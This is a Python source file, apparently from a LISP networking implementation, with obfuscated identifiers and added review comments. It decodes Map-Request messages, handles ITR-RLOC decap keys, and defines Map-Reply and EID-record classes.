if 31 - 31: Oo0Ooo % iIii1I11I1II1 . O0
def decode(self, packet, source, port):
    #
    # Parse a LISP Map-Request from the raw 'packet' buffer (network byte
    # order).  'source' is the outer source address and 'port' the source
    # UDP port; both are used only for decap crypto-key bookkeeping on the
    # ITR-RLOC records.  Returns the unconsumed remainder of 'packet' on
    # success, or None on any parse error.
    #
    # First 32-bit word: type, flag bits, itr-rloc-count, record-count.
    #
    o00OooooOOOO = "I"
    oO0o00O = struct.calcsize(o00OooooOOOO)
    if (len(packet) < oO0o00O): return(None)
    if 80 - 80: I11i / Oo0Ooo + I1ii11iIi11i
    i1IiIiiiii11 = struct.unpack(o00OooooOOOO, packet[:oO0o00O])
    i1IiIiiiii11 = i1IiIiiiii11[0]
    packet = packet[oO0o00O::]
    if 18 - 18: II111iiii - iII111i / iIii1I11I1II1 % OoOoOO00 % I1ii11iIi11i / o0oOOo0O0Ooo
    #
    # 64-bit nonce follows the first long-word.
    #
    o00OooooOOOO = "Q"
    oO0o00O = struct.calcsize(o00OooooOOOO)
    if (len(packet) < oO0o00O): return(None)
    if 47 - 47: OOooOOo
    OO00OO = struct.unpack(o00OooooOOOO, packet[:oO0o00O])
    packet = packet[oO0o00O::]
    if 24 - 24: Ii1I % o0oOOo0O0Ooo
    #
    # Crack the flag bits out of the host-order first long-word.
    #
    i1IiIiiiii11 = socket.ntohl(i1IiIiiiii11)
    self.auth_bit = True if (i1IiIiiiii11 & 0x08000000) else False
    self.map_data_present = True if (i1IiIiiiii11 & 0x04000000) else False
    self.rloc_probe = True if (i1IiIiiiii11 & 0x02000000) else False
    self.smr_bit = True if (i1IiIiiiii11 & 0x01000000) else False
    self.pitr_bit = True if (i1IiIiiiii11 & 0x00800000) else False
    self.smr_invoked_bit = True if (i1IiIiiiii11 & 0x00400000) else False
    self.mobile_node = True if (i1IiIiiiii11 & 0x00200000) else False
    self.xtr_id_present = True if (i1IiIiiiii11 & 0x00100000) else False
    self.local_xtr = True if (i1IiIiiiii11 & 0x00004000) else False
    self.dont_reply_bit = True if (i1IiIiiiii11 & 0x00002000) else False
    # Wire value is "count minus one"; store the actual count.
    self.itr_rloc_count = ((i1IiIiiiii11 >> 8) & 0x1f) + 1
    self.record_count = i1IiIiiiii11 & 0xff
    self.nonce = OO00OO[0]
    if 87 - 87: o0oOOo0O0Ooo % iII111i / ooOoO0o - IiII + i11iIiiIii
    if 85 - 85: OoooooooOO * IiII . OOooOOo / iII111i / OoooooooOO
    if 87 - 87: OoO0O00
    if 32 - 32: i11iIiiIii - OoOoOO00 * I11i . Oo0Ooo * ooOoO0o
    #
    # The xtr-id, when present, trails the packet; pull it out now.
    # NOTE(review): decode_xtr_id() returns None (not False) on a short
    # packet, so this '== False' test never fires — verify upstream.
    #
    if (self.xtr_id_present):
        if (self.decode_xtr_id(packet) == False): return(None)
        if 21 - 21: OOooOOo
    if 11 - 11: oO0o % i11iIiiIii * O0
    #
    # Source-EID AFI (2 bytes), then the source-EID address itself.
    #
    oO0o00O = struct.calcsize("H")
    if (len(packet) < oO0o00O): return(None)
    if 28 - 28: I1Ii111 / iIii1I11I1II1 + OOooOOo . I1ii11iIi11i % OOooOOo + OoO0O00
    oO0oO00 = struct.unpack("H", packet[:oO0o00O])
    self.source_eid.afi = socket.ntohs(oO0oO00[0])
    packet = packet[oO0o00O::]
    if 79 - 79: oO0o
    if (self.source_eid.afi == LISP_AFI_LCAF):
        # LCAF-encoded source-EID: try instance-id encoding first, then
        # fall back to the JSON LCAF form on the saved buffer.
        I11I1iIiI1I = packet
        packet = self.source_eid.lcaf_decode_iid(packet)
        if (packet == None):
            packet = self.lcaf_decode_json(I11I1iIiI1I)
            if (packet == None): return(None)
        if 83 - 83: i11iIiiIii + iIii1I11I1II1
    elif (self.source_eid.afi != LISP_AFI_NONE):
        packet = self.source_eid.unpack_address(packet)
        if (packet == None): return(None)
    if 21 - 21: o0oOOo0O0Ooo / i11iIiiIii % I1Ii111
    self.source_eid.mask_len = self.source_eid.host_mask_len()
    if 56 - 56: o0oOOo0O0Ooo * iIii1I11I1II1 . Ii1I + OoOoOO00 % I1Ii111
    # When LISP_NO_CRYPTO is set, ITR-RLOCs are collected without any
    # security-key processing.
    iiI1i111I1 = (os.getenv("LISP_NO_CRYPTO") != None)
    self.itr_rlocs = []
    while (self.itr_rloc_count != 0):
        oO0o00O = struct.calcsize("H")
        if (len(packet) < oO0o00O): return(None)
        if 26 - 26: OoooooooOO . i1IIi + OoO0O00
        oO0oO00 = struct.unpack("H", packet[:oO0o00O])[0]
        if 42 - 42: i11iIiiIii * o0oOOo0O0Ooo % I11i % Oo0Ooo + o0oOOo0O0Ooo * i11iIiiIii
        oo0O0oO0o = lisp_address(LISP_AFI_NONE, "", 32, 0)
        oo0O0oO0o.afi = socket.ntohs(oO0oO00)
        if 66 - 66: Ii1I / IiII . OoooooooOO * Oo0Ooo % i11iIiiIii
        if 100 - 100: I1ii11iIi11i % II111iiii * i11iIiiIii - iII111i
        if 69 - 69: OOooOOo + iII111i / I1Ii111
        if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
        if 93 - 93: ooOoO0o + ooOoO0o
        if (oo0O0oO0o.afi != LISP_AFI_LCAF):
            #
            # Plain AFI-encoded ITR-RLOC (no security material).
            #
            if (len(packet) < oo0O0oO0o.addr_length()): return(None)
            packet = oo0O0oO0o.unpack_address(packet[oO0o00O::])
            if (packet == None): return(None)
            if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
            if (iiI1i111I1):
                self.itr_rlocs.append(oo0O0oO0o)
                self.itr_rloc_count -= 1
                continue
            if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
            if 32 - 32: Oo0Ooo . O0
            oOo0O = lisp_build_crypto_decap_lookup_key(oo0O0oO0o, port)
            if 48 - 48: I1ii11iIi11i % II111iiii + I11i
            if 25 - 25: IiII * o0oOOo0O0Ooo / I1IiiI . IiII % II111iiii
            if 50 - 50: OoOoOO00 * iII111i
            if 59 - 59: I1IiiI * I1IiiI / I11i
            if 92 - 92: o0oOOo0O0Ooo
            # Behind a NAT, a private ITR-RLOC is replaced with the outer
            # (translated) source address for key lookup.
            if (lisp_nat_traversal and oo0O0oO0o.is_private_address() and source): oo0O0oO0o = source
            if 8 - 8: iII111i + I1ii11iIi11i . Ii1I
            # No security material in this request: drop any stale decap
            # keys stored for this RLOC and tell the data-plane via IPC.
            ii1I11ii1I11 = lisp_crypto_keys_by_rloc_decap
            if (ii1I11ii1I11.has_key(oOo0O)): ii1I11ii1I11.pop(oOo0O)
            if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
            if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
            if 22 - 22: i1IIi / OoooooooOO . OoO0O00
            if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
            if 90 - 90: I1IiiI - i11iIiiIii
            if 42 - 42: OOooOOo . Oo0Ooo
            lisp_write_ipc_decap_key(oOo0O, None)
        else:
            #
            # LCAF security-type ITR-RLOC: carries a Diffie-Hellman key
            # exchange.  First decode just to learn the cipher suite.
            #
            IiIIIii1iIII1 = packet
            i1i1IIiIiI11 = lisp_keys(1)
            packet = i1i1IIiIiI11.decode_lcaf(IiIIIii1iIII1, 0)
            if (packet == None): return(None)
            if 61 - 61: i11iIiiIii % I1Ii111 / o0oOOo0O0Ooo
            if 40 - 40: OOooOOo / Ii1I % I1IiiI / o0oOOo0O0Ooo . iII111i
            if 78 - 78: I11i - I1IiiI * IiII
            if 43 - 43: OoooooooOO . OOooOOo
            # Re-decode with a key object configured for the negotiated
            # cipher suite (curve25519 CBC/GCM vs chacha vs legacy).
            IIiIiIii11I1 = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
                LISP_CS_25519_CHACHA]
            if (i1i1IIiIiI11.cipher_suite in IIiIiIii11I1):
                if (i1i1IIiIiI11.cipher_suite == LISP_CS_25519_CBC or
                    i1i1IIiIiI11.cipher_suite == LISP_CS_25519_GCM):
                    iII1 = lisp_keys(1, do_poly=False, do_chacha=False)
                if 33 - 33: o0oOOo0O0Ooo % OoOoOO00 * I1IiiI
                if (i1i1IIiIiI11.cipher_suite == LISP_CS_25519_CHACHA):
                    iII1 = lisp_keys(1, do_poly=True, do_chacha=True)
                if 26 - 26: I11i . iII111i . o0oOOo0O0Ooo
            else:
                iII1 = lisp_keys(1, do_poly=False, do_curve=False,
                    do_chacha=False)
            if 15 - 15: OoO0O00 / iII111i
            packet = iII1.decode_lcaf(IiIIIii1iIII1, 0)
            if (packet == None): return(None)
            if 46 - 46: OoooooooOO . I1Ii111
            # oO0o00O still holds calcsize("H") — the AFI that follows
            # the LCAF encoding.
            if (len(packet) < oO0o00O): return(None)
            oO0oO00 = struct.unpack("H", packet[:oO0o00O])[0]
            oo0O0oO0o.afi = socket.ntohs(oO0oO00)
            if (len(packet) < oo0O0oO0o.addr_length()): return(None)
            if 15 - 15: Ii1I
            packet = oo0O0oO0o.unpack_address(packet[oO0o00O::])
            if (packet == None): return(None)
            if 84 - 84: OoOoOO00 - ooOoO0o - OoooooooOO . OoooooooOO % IiII
            if (iiI1i111I1):
                self.itr_rlocs.append(oo0O0oO0o)
                self.itr_rloc_count -= 1
                continue
            if 38 - 38: OoO0O00 * I1ii11iIi11i
            if 4 - 4: OoO0O00 . I1ii11iIi11i
            oOo0O = lisp_build_crypto_decap_lookup_key(oo0O0oO0o, port)
            if 21 - 21: i11iIiiIii / OoO0O00 / I1ii11iIi11i * O0 - II111iiii * OOooOOo
            II = None
            if (lisp_nat_traversal and oo0O0oO0o.is_private_address() and source): oo0O0oO0o = source
            if 87 - 87: Ii1I * iII111i * O0
            if 93 - 93: IiII % I1Ii111 % II111iiii
            # Look up any previously stored decap key for this RLOC.
            if (lisp_crypto_keys_by_rloc_decap.has_key(oOo0O)):
                O0000 = lisp_crypto_keys_by_rloc_decap[oOo0O]
                II = O0000[1] if O0000 and O0000[1] else None
            if 20 - 20: OoooooooOO * I1Ii111
            if 38 - 38: iII111i . OoooooooOO
            # Decide whether the ITR kept the same keys (keep stored
            # state) or is rekeying (copy keypair, recompute below).
            i1iiI11ii1II1 = True
            if (II):
                if (II.compare_keys(iII1)):
                    self.keys = [None, II, None, None]
                    lprint("Maintain stored decap-keys for RLOC {}".format(red(oOo0O, False)))
                    if 33 - 33: oO0o / I11i . OoOoOO00 * O0 - IiII
                else:
                    i1iiI11ii1II1 = False
                    ii1IIi = bold("Remote decap-rekeying", False)
                    lprint("{} for RLOC {}".format(ii1IIi, red(oOo0O,
                        False)))
                    iII1.copy_keypair(II)
                    iII1.uptime = II.uptime
                    II = None
                if 44 - 44: I1IiiI + IiII / I1ii11iIi11i
            if 31 - 31: II111iiii - I1ii11iIi11i % I11i . o0oOOo0O0Ooo - i11iIiiIii / I11i
            if 100 - 100: i11iIiiIii * i11iIiiIii . iIii1I11I1II1 % iII111i * I1ii11iIi11i
            if (II == None):
                self.keys = [None, iII1, None, None]
                # Only an ETR or RTR actually computes decap keys; other
                # roles log and ignore the material.
                if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
                    iII1.local_public_key = None
                    lprint("{} for {}".format(bold("Ignoring decap-keys",
                        False), red(oOo0O, False)))
                elif (iII1.remote_public_key != None):
                    if (i1iiI11ii1II1):
                        lprint("{} for RLOC {}".format(bold("New decap-keying", False),
                            red(oOo0O, False)))
                    if 91 - 91: IiII * i11iIiiIii / I1ii11iIi11i / i1IIi . IiII
                    iII1.compute_shared_key("decap")
                    iII1.add_key_by_rloc(oOo0O, False)
                if 35 - 35: i11iIiiIii / OoooooooOO
                if 36 - 36: iII111i
            if 91 - 91: ooOoO0o + IiII . I1IiiI / I11i / IiII
            if 23 - 23: I1ii11iIi11i - OOooOOo - i1IIi
        self.itr_rlocs.append(oo0O0oO0o)
        self.itr_rloc_count -= 1
    if 20 - 20: OoooooooOO / Oo0Ooo * OoO0O00 . o0oOOo0O0Ooo . I1IiiI
    if 75 - 75: iIii1I11I1II1 - Ii1I % O0 % IiII
    #
    # Finally, the EID-record: subscribe bit, mask-length, target AFI,
    # then the target EID (possibly an LCAF (S,G) or instance-id form).
    #
    oO0o00O = struct.calcsize("BBH")
    if (len(packet) < oO0o00O): return(None)
    if 6 - 6: Oo0Ooo % oO0o * ooOoO0o - i1IIi . OoOoOO00
    O00, Ooo0o00, oO0oO00 = struct.unpack("BBH", packet[:oO0o00O])
    self.subscribe_bit = (O00 & 0x80)
    self.target_eid.afi = socket.ntohs(oO0oO00)
    packet = packet[oO0o00O::]
    if 20 - 20: Oo0Ooo / I1Ii111 . Oo0Ooo
    self.target_eid.mask_len = Ooo0o00
    if (self.target_eid.afi == LISP_AFI_LCAF):
        packet, OO0O0ooOo = self.target_eid.lcaf_decode_eid(packet)
        if (packet == None): return(None)
        if (OO0O0ooOo): self.target_group = OO0O0ooOo
    else:
        packet = self.target_eid.unpack_address(packet)
        if (packet == None): return(None)
        packet = packet[oO0o00O::]
    if 23 - 23: OoO0O00 / IiII * II111iiii
    return(packet)
if 32 - 32: I1Ii111 - iIii1I11I1II1 / I11i * OoO0O00 * OoO0O00
if 77 - 77: I1ii11iIi11i
def print_eid_tuple(self):
    """Render this message's (target-EID, target-group) pair for display."""
    eid, group = self.target_eid, self.target_group
    return(lisp_print_eid_tuple(eid, group))
if 16 - 16: II111iiii - II111iiii * I11i / OOooOOo . IiII
if 36 - 36: I11i / iIii1I11I1II1
def encode_xtr_id(self, packet):
    """Append the 128-bit xtr-id to 'packet' as two byte-swapped
    64-bit quantities and return the extended buffer."""
    high_half = byte_swap_64(self.xtr_id >> 64)
    low_half = byte_swap_64(self.xtr_id & 0xffffffffffffffff)
    return(packet + struct.pack("QQ", high_half, low_half))
if 59 - 59: i1IIi
if 85 - 85: I1Ii111 + iIii1I11I1II1 + ooOoO0o + Oo0Ooo
def decode_xtr_id(self, packet):
    """Extract the 128-bit xtr-id carried in the LAST 16 bytes of 'packet'.

    Stores the value in self.xtr_id and returns True.  Returns False when
    the packet is too short.  (Bug fix: this previously returned None on
    the short-packet case, which the caller's '== False' test never
    matched, so truncated packets were silently accepted.)
    """
    oO0o00O = struct.calcsize("QQ")
    if (len(packet) < oO0o00O): return(False)

    # The xtr-id trails the message; seek to the final 16 bytes.
    packet = packet[len(packet) - oO0o00O::]
    oO0ooOoOooO00o00, o0Ooo00Oo0oo0 = struct.unpack("QQ", packet[:oO0o00O])
    oO0ooOoOooO00o00 = byte_swap_64(oO0ooOoOooO00o00)
    o0Ooo00Oo0oo0 = byte_swap_64(o0Ooo00Oo0oo0)
    self.xtr_id = (oO0ooOoOooO00o00 << 64) | o0Ooo00Oo0oo0
    return(True)
if 75 - 75: O0 . I11i - Ii1I / I1Ii111 / I1ii11iIi11i % I11i
if 97 - 97: OoOoOO00 - OoO0O00
if 64 - 64: i1IIi / OoooooooOO / I1ii11iIi11i - Oo0Ooo + oO0o
if 6 - 6: OOooOOo % II111iiii * IiII
if 34 - 34: I11i % iII111i - ooOoO0o - I1IiiI
if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
if 45 - 45: Ii1I / oO0o * I1Ii111 . Ii1I
if 25 - 25: I1ii11iIi11i / I1ii11iIi11i
if 79 - 79: Oo0Ooo - OoO0O00 % Oo0Ooo . II111iiii
if 84 - 84: ooOoO0o * OoooooooOO + O0
if 84 - 84: i1IIi . I11i . i1IIi . Oo0Ooo
if 21 - 21: II111iiii . O0 + Oo0Ooo - i11iIiiIii
if 5 - 5: iIii1I11I1II1 * i11iIiiIii + OoO0O00 + I11i * O0 % ooOoO0o
if 88 - 88: o0oOOo0O0Ooo / i11iIiiIii * I1ii11iIi11i
if 23 - 23: O0 / iII111i
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
if 14 - 14: I1IiiI . IiII
if 29 - 29: OoooooooOO / IiII + OoOoOO00 - I1Ii111 + IiII . i1IIi
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
if 39 - 39: ooOoO0o - OoooooooOO
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
if 74 - 74: ooOoO0o - i11iIiiIii
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
if 33 - 33: Ii1I . i1IIi - II111iiii - OoO0O00
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
class lisp_map_reply():
    """A LISP Map-Reply message header (RFC 6830, section 6.1.4).

    Holds the flag bits, hop/record counts, the 64-bit nonce, and any
    crypto keys previously stored under that nonce.  The EID-records that
    follow the header are parsed separately.
    """

    def __init__(self):
        self.rloc_probe = False           # R-bit: reply to an RLOC-probe
        self.echo_nonce_capable = False   # E-bit
        self.security = False             # S-bit
        self.record_count = 0
        self.hop_count = 0
        self.nonce = 0
        self.keys = None                  # keys recovered by nonce in decode()

    def print_map_reply(self):
        """Log a one-line summary of this Map-Reply."""
        I111 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
        lprint(I111.format(bold("Map-Reply", False),
            "R" if self.rloc_probe else "r",
            "E" if self.echo_nonce_capable else "e",
            "S" if self.security else "s", self.hop_count, self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        """Return the packed 12-byte Map-Reply header: type/flags/counts
        long-word followed by the 64-bit nonce."""
        i1IiIiiiii11 = (LISP_MAP_REPLY << 28) | self.record_count
        i1IiIiiiii11 |= self.hop_count << 8
        if (self.rloc_probe): i1IiIiiiii11 |= 0x08000000
        if (self.echo_nonce_capable): i1IiIiiiii11 |= 0x04000000
        if (self.security): i1IiIiiiii11 |= 0x02000000

        ii1i1II = struct.pack("I", socket.htonl(i1IiIiiiii11))
        ii1i1II += struct.pack("Q", self.nonce)
        return(ii1i1II)

    def decode(self, packet):
        """Parse the 12-byte Map-Reply header from 'packet'.

        Returns the unconsumed remainder of the buffer, or None if the
        packet is too short.  If crypto keys were stored under this nonce,
        they are moved into self.keys and unindexed from the nonce table.
        """
        o00OooooOOOO = "I"
        oO0o00O = struct.calcsize(o00OooooOOOO)
        if (len(packet) < oO0o00O): return(None)

        i1IiIiiiii11 = struct.unpack(o00OooooOOOO, packet[:oO0o00O])
        i1IiIiiiii11 = i1IiIiiiii11[0]
        packet = packet[oO0o00O::]

        o00OooooOOOO = "Q"
        oO0o00O = struct.calcsize(o00OooooOOOO)
        if (len(packet) < oO0o00O): return(None)

        OO00OO = struct.unpack(o00OooooOOOO, packet[:oO0o00O])
        packet = packet[oO0o00O::]

        i1IiIiiiii11 = socket.ntohl(i1IiIiiiii11)
        self.rloc_probe = True if (i1IiIiiiii11 & 0x08000000) else False
        self.echo_nonce_capable = True if (i1IiIiiiii11 & 0x04000000) else False
        self.security = True if (i1IiIiiiii11 & 0x02000000) else False
        self.hop_count = (i1IiIiiiii11 >> 8) & 0xff
        self.record_count = i1IiIiiiii11 & 0xff
        self.nonce = OO00OO[0]

        # dict.has_key() was removed in Python 3; 'in' is equivalent and
        # works on both Python 2 and 3.
        if (self.nonce in lisp_crypto_keys_by_nonce):
            self.keys = lisp_crypto_keys_by_nonce[self.nonce]
            self.keys[1].delete_key_by_nonce(self.nonce)

        return(packet)
if 60 - 60: ooOoO0o - Ii1I . I1IiiI * oO0o * i11iIiiIii
if 29 - 29: OoO0O00 - Oo0Ooo . oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
if 78 - 78: I1Ii111 - O0 - I1Ii111 . iIii1I11I1II1 % I1ii11iIi11i . OoooooooOO
if 64 - 64: IiII
if 21 - 21: o0oOOo0O0Ooo - ooOoO0o * OoooooooOO . OoooooooOO
if 17 - 17: OOooOOo - iII111i % I1IiiI * OOooOOo * iIii1I11I1II1 . o0oOOo0O0Ooo
if 58 - 58: oO0o - II111iiii + O0
if 54 - 54: iIii1I11I1II1 - IiII - IiII
if 18 - 18: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii
if 63 - 63: iII111i - OoO0O00 * OOooOOo
if 89 - 89: iII111i / Oo0Ooo
if 66 - 66: o0oOOo0O0Ooo + OoOoOO00 % OoooooooOO . I11i
if 30 - 30: II111iiii - Oo0Ooo - i11iIiiIii + O0
if 93 - 93: i1IIi + I1Ii111 / OoO0O00 - I11i % Oo0Ooo / Ii1I
if 1 - 1: Oo0Ooo / Ii1I . i11iIiiIii % OOooOOo + o0oOOo0O0Ooo + O0
if 54 - 54: I1Ii111 + ooOoO0o % IiII
if 83 - 83: o0oOOo0O0Ooo * iIii1I11I1II1
if 36 - 36: OoOoOO00 + II111iiii - OoO0O00 % ooOoO0o * i1IIi
if 4 - 4: Ii1I + OoO0O00 * I1ii11iIi11i
if 13 - 13: OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
if 46 - 46: OoO0O00 * I1IiiI
if 25 - 25: I1Ii111 . IiII % O0 % i1IIi
if 53 - 53: O0 % ooOoO0o
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
class lisp_eid_record():
    #
    # One EID-record as carried in Map-Request/Map-Reply/Map-Register/
    # Map-Referral messages: record TTL, RLOC count, action, flags,
    # map-version, and the EID-prefix (with optional multicast group).
    #
    def __init__(self):
        self.record_ttl = 0          # TTL in minutes; top bit => seconds
        self.rloc_count = 0
        self.action = 0
        self.authoritative = False
        self.ddt_incomplete = False  # DDT Map-Referral only
        self.signature_count = 0
        self.map_version = 0
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.record_ttl = 0          # NOTE(review): duplicate of line above
    if 22 - 22: i1IIi
    if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
    def print_prefix(self):
        # Unicast prefix when no group is set, otherwise (S,G) form.
        if (self.group.is_null()):
            return(green(self.eid.print_prefix(), False))
        if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
        return(green(self.eid.print_sg(self.group), False))
    if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
    if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
    def print_ttl(self):
        # Render the TTL for display.  record_ttl is in minutes; the top
        # bit flags a value in seconds.  The /60 relies on Python 2
        # integer division.
        oo0OOoOO0 = self.record_ttl
        if (self.record_ttl & 0x80000000):
            oo0OOoOO0 = str(self.record_ttl & 0x7fffffff) + " secs"
        elif ((oo0OOoOO0 % 60) == 0):
            oo0OOoOO0 = str(oo0OOoOO0 / 60) + " hours"
        else:
            oo0OOoOO0 = str(oo0OOoOO0) + " mins"
        if 16 - 16: oO0o * iII111i % i1IIi . OoOoOO00 * iIii1I11I1II1
        return(oo0OOoOO0)
    if 17 - 17: OoooooooOO . OOooOOo
    if 32 - 32: OoOoOO00 . oO0o + O0
    def store_ttl(self):
        # Return the TTL in seconds: minutes * 60, unless the top bit
        # says the stored value is already in seconds.
        oo0OOoOO0 = self.record_ttl * 60
        if (self.record_ttl & 0x80000000): oo0OOoOO0 = self.record_ttl & 0x7fffffff
        return(oo0OOoOO0)
    if 100 - 100: O0 / OOooOOo - ooOoO0o
    if 15 - 15: iII111i - O0 - OoooooooOO
    def print_record(self, indent, ddt):
        # Log this EID-record.  'ddt' selects the Map-Referral action
        # string table instead of the Map-Reply one.
        iiiiIIiiII1Iii1 = ""
        OOo0O0O000 = ""
        o0oOOoO0o0 = bold("invalid-action", False)
        if (ddt):
            if (self.action < len(lisp_map_referral_action_string)):
                o0oOOoO0o0 = lisp_map_referral_action_string[self.action]
                o0oOOoO0o0 = bold(o0oOOoO0o0, False)
            iiiiIIiiII1Iii1 = (", " + bold("ddt-incomplete", False)) if self.ddt_incomplete else ""
            if 56 - 56: I1IiiI . I11i % iII111i
            OOo0O0O000 = (", sig-count: " + str(self.signature_count)) if (self.signature_count != 0) else ""
            if 33 - 33: I11i / OOooOOo - OOooOOo / i11iIiiIii * OoOoOO00 + O0
            if 2 - 2: i11iIiiIii % I1IiiI
        else:
            if (self.action < len(lisp_map_reply_action_string)):
                o0oOOoO0o0 = lisp_map_reply_action_string[self.action]
                if (self.action != LISP_NO_ACTION):
                    o0oOOoO0o0 = bold(o0oOOoO0o0, False)
                if 90 - 90: II111iiii
            if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
        if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
        if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
        # Negative afi values are internal pseudo-AFIs encoded as LCAF.
        oO0oO00 = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
        I111 = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
            "{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
        if 71 - 71: i1IIi / I11i
        lprint(I111.format(indent, self.print_ttl(), self.rloc_count,
            o0oOOoO0o0, "auth" if (self.authoritative is True) else "non-auth",
            iiiiIIiiII1Iii1, OOo0O0O000, self.map_version, oO0oO00,
            green(self.print_prefix(), False)))
    if 14 - 14: OoooooooOO
    if 99 - 99: o0oOOo0O0Ooo * o0oOOo0O0Ooo
    def encode(self):
        # Pack this EID-record into wire format and return the buffer.
        # Flags word: action in the top 3 bits, then auth and
        # ddt-incomplete bits.
        Ii1II1I = self.action << 13
        if (self.authoritative): Ii1II1I |= 0x1000
        if (self.ddt_incomplete): Ii1II1I |= 0x800
        if 5 - 5: OOooOOo . iII111i . oO0o % IiII * O0
        if 20 - 20: Oo0Ooo . I1IiiI . I1IiiI / OoooooooOO . OoooooooOO + iIii1I11I1II1
        if 60 - 60: OoOoOO00 / ooOoO0o % iIii1I11I1II1
        if 32 - 32: i11iIiiIii + II111iiii + II111iiii % I11i
        # A non-zero instance-id, negative (internal) AFI, or an (S,G)
        # entry all force LCAF encoding.
        oO0oO00 = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
        if (oO0oO00 < 0): oO0oO00 = LISP_AFI_LCAF
        o0000o0o = (self.group.is_null() == False)
        if (o0000o0o): oO0oO00 = LISP_AFI_LCAF
        if 75 - 75: I11i - OoO0O00 - iII111i % iIii1I11I1II1 * OoO0O00
        I1I1iI1i = (self.signature_count << 12) | self.map_version
        Ooo0o00 = 0 if self.eid.is_binary() == False else self.eid.mask_len
        if 13 - 13: OoO0O00 - Oo0Ooo / OoO0O00
        ii1i1II = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
            self.rloc_count, Ooo0o00, socket.htons(Ii1II1I),
            socket.htons(I1I1iI1i), socket.htons(oO0oO00))
        if 34 - 34: i11iIiiIii + OoO0O00 + i11iIiiIii . IiII % O0
        if 64 - 64: o0oOOo0O0Ooo . iIii1I11I1II1
        if 86 - 86: ooOoO0o - I11i . iIii1I11I1II1 - iIii1I11I1II1
        if 61 - 61: Ii1I % Oo0Ooo + OoOoOO00
        # (S,G) entries use the LCAF source/group encoding.
        if (o0000o0o):
            ii1i1II += self.eid.lcaf_encode_sg(self.group)
            return(ii1i1II)
        if 60 - 60: oO0o . OoooooooOO
        if 40 - 40: I11i
        if 44 - 44: ooOoO0o
        if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
        if 97 - 97: I1IiiI / o0oOOo0O0Ooo
        # Geo-coordinate with no instance-id: strip the AFI just packed
        # and substitute the geo encoding.
        if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
            ii1i1II = ii1i1II[0:-2]
            ii1i1II += self.eid.address.encode_geo()
            return(ii1i1II)
        if 13 - 13: I1ii11iIi11i
        if 72 - 72: Oo0Ooo + IiII / Ii1I * Oo0Ooo
        if 41 - 41: OOooOOo - OoOoOO00 . I1IiiI + i11iIiiIii + OoO0O00 * iII111i
        if 85 - 85: OoO0O00 + II111iiii
        if 87 - 87: OoO0O00
        # Instance-id LCAF wrapper around the EID.
        if (oO0oO00 == LISP_AFI_LCAF):
            ii1i1II += self.eid.lcaf_encode_iid()
            return(ii1i1II)
        if 93 - 93: OoooooooOO
        if 80 - 80: o0oOOo0O0Ooo
        if 3 - 3: i11iIiiIii / OOooOOo + oO0o
        if 10 - 10: OoO0O00 . OoO0O00 + O0
        if 13 - 13: i1IIi . I1IiiI
        # Plain AFI-encoded address.
        ii1i1II += self.eid.pack_address()
        return(ii1i1II)
